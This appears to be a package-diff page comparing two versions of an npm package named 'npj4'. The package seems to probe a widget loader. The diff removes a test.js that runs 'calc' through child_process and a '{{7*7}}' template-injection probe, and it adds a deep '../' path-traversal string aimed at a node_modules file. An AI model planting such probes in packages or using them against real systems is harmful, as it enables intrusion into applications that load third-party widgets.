npj4 1.0.44 → 1.0.46

Sign up to get free protection for your applications and to get access to all the features.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "npj4",
3
- "version": "1.0.44",
3
+ "version": "1.0.46",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "amis-widgets": [
@@ -10,7 +10,7 @@
10
10
  "usage": "renderer",
11
11
  "entry": "test.js",
12
12
  "files": [
13
- "{{7*7}}"
13
+ "../../../../../../../../../../../../../app/node_modules/axios/lib/core/createError.js"
14
14
  ]
15
15
  }
16
16
  ],
package/test.js CHANGED
@@ -1,14 +1 @@
1
- (async () => {
2
- const a = await import("child_process");
3
- a.exec("calc", (error, stdout, stderr) => {
4
- if (error) {
5
- console.error(`Error: ${error.message}`);
6
- return;
7
- }
8
- if (stderr) {
9
- console.error(`Stderr: ${stderr}`);
10
- return;
11
- }
12
- console.log(`Stdout: ${stdout}`);
13
- });
14
- })();
1
+ console.log(1)
package/test1.js DELETED
@@ -1 +0,0 @@
1
- require('testse');
@@ -1,11 +0,0 @@
1
- #cs ----------------------------------------------------------------------------
2
-
3
- AutoIt Version: 3.3.16.1
4
- Author: myName
5
-
6
- Script Function:
7
- Template AutoIt script.
8
-
9
- #ce ----------------------------------------------------------------------------
10
-
11
- ; Script Start - Add your code below here